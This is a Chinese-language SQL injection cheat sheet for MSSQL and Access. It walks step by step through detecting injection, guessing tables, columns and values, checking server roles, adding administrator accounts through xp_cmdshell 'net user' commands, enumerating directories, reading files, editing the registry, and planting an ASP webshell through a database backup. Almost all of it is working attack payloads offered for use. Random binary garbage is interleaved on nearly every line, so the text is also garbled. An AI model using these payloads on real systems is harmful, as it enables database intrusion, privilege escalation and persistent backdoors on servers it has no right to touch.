1.判断是否有注入;and 1=1 ;and 1=2 Di�r# �[�j
2.初步判断是否是mssql ;and user>0 gjJ:s,�F�g
���Ug[0l)�
3.注入参数是字符'and [查询条件] and ''=' [ P��*�L`F
ee<'j~{��A
4.搜索时没过滤参数的'and [查询条件] and '%25'=' �?<OE|nb&�
�](�+u��'8
5.判断数据库系统 �lBG5~<NT�
,S��}wOjb@
;and (select count(*) from sysobjects)>0 mssql �u#��oc�x[
'*U_!Rm�Q�
;and (select count(*) from msysobjects)>0 access (e
�2�.Ru�
rXrIGg��eM
.dc�|?$XV�
5n::]Q%�=D
6.猜数据库 ;and (select Count(*) from [数据库名])>0 M�6[O>���z
V+�u0�J"/8
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
�8`<�3rj�
bHDZ=I�k��
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 pB��V�zmQF
�AS�S<�XNP
9.(1)猜字段的ascii值(access) `)i�4Z�mE|
Pr�/�q?qZY
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ,]@Sytky��
t,~���feW,
(2)猜字段的ascii值(mssql) �Ch=j��t*0
YyY?<<��z%
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 REOWSs$'��
1Lm�bX�H]%
10.测试权限结构(mssql) #E��/|W�T�
+D h?M�Qt?
0sq?>$~Kc*
Z���4�k'c+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- (�>\4%(pnD
>���(gbUW�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- B�.�?�@VF�
t4�zKI~cO
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- PTF|"^k+
�
{�o�%OG/!1
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- R|\�kk?,�u
OQ3Ik�E`G
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ���b\S�B�
�oPxh+�|0?
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �I_`�$$-|�
�2N&�S_�_
;and 1=(select IS_MEMBER('db_owner'));-- )�u�Ca]IR�
��/��7�R0w
�U�@".XIDQ
W
6��R�/{H
11.添加mssql和系统的帐户 tHJa�hK:"k
;�3��=R�M\
;exec master.dbo.sp_addlogin username;-- A2nL�=9~
�
;exec master.dbo.sp_password null,username,password;-- Fd�xV#.BE�
bL%-�9B�G
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- "6WE6z�q��
&�7w*=�f8I
;exec master.dbo.xp_cmdshell 'net user username password r#mH[|@W~�
G'iE�`4`�2
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �tRR<4}4R�
a/~1C�r�Yr
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �2Gc0pBqx�
R�bEtNwG@c
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- 7]
>�z� e�
P.Qz>�c^-C
�)9���{!=k
;C5
J�^xHI
12.(1)遍历目录 ](k}B*Ab�h
k��I~;�'�M
;create table dirs(paths varchar(100), id int) AR)A �<���
3Q���#�3�S
;insert dirs exec master.dbo.xp_dirtree 'c:\' xQs._�Y�Y
X<:Zx#J?�i
;and (select top 1 paths from dirs)>0 7!g4�`@!5M
V�4?]�NF�K
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) U5;Y o�+z�
LV]F?�O[K=
�p=dM��2>�
ov Wm}!��r
(2)遍历目录 NHD�`c��)Q
t|�5��9/R�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 97^�)���B4
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 `G>�BvS5h�
EE�~DU;p;]
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 A�gJPtz�s
C�uY�Sv��W
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 9t{I�v({6p
���ghaO#kI
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 tf�{o=X.)�
�;�/(<yu48
q}�p
(p( N
z4s{a(Tsd�
13.mssql中的存储过程 ���26-K:"
QqB�9I-�_�
xp_regenumvalues 注册表根键, 子键 !@f!4n.e|I
�l\�&T�w[O
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �.� �L�]!*
L@~0`z:>iP
xp_regread 根键,子键,键值名 #��D O�ui]
m$�^v/pLkM
;exec xp_regread ,z�|g b]�\
,Y27uey{wa
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �&BRi�& &f
��=R�||c�
xp_regwrite 根键,子键, 值名, 值类型, 值 }b]z+4U�a(
~��=c[�?�:
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 N'M+Z=�!
�
'��8"$�:y�
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �6F�?U:N#<
j7=x&)qbx
xp_regdeletevalue 根键,子键,值名 x|��A{|oFC
dJ=z�'?|%g
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �tQ�(gB_��
�MO�u��=�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 �-h#9sl-�>
lm�(�k[]�@
V?-�O��I�>
�F��)��uS2
14.mssql的backup创建webshell -<@�QR8:�
0)�9'x)l:�
use model �
pytF
K)U
aF:|MTC(~�
create table cmd(str image); K�`twb�TU�
cDLjjK7: �
insert into cmd(str) values (''); s�)V�<dm;T
nj�BK���{
backup database model to disk='c:\l.asp'; ���DBZ^n�9
P(~��vqo>!
W�4S! r�U
kPF�qs��q�
15.mssql内置函数 ,I�8[tiR"b
6�e�:#x:O�
;and (select @@version)>0 获得Windows的版本号 76��R�Fu@k
{*�t0WE&1t
;and user_name()='dbo' 判断当前系统的连接用户是不是sa LV���xR�*O
Et+W�L�Q6)
;and (select user_name())>0 爆当前系统的连接用户 �7eQ��c1�4
C�?7�I(b:�
;and (select db_name())>0 得到当前连接的数据库 ^�Z:qlY��Z
*w��aaM]u�
�H4IJL�Z3G
6�1&��A��`
16.简洁的webshell 4Y4QR[>IU3
U|)�C�ZcM�
use model _Rm�1�-,3�
GGkU�$qp2~
create table cmd(str image); '�(�y��jq<
05/'qf7P,U
insert into cmd(str) values (''); �E@92hB4D"
�:��6y;��U
backup database model to disk='g:\wwwtest\l.asp';
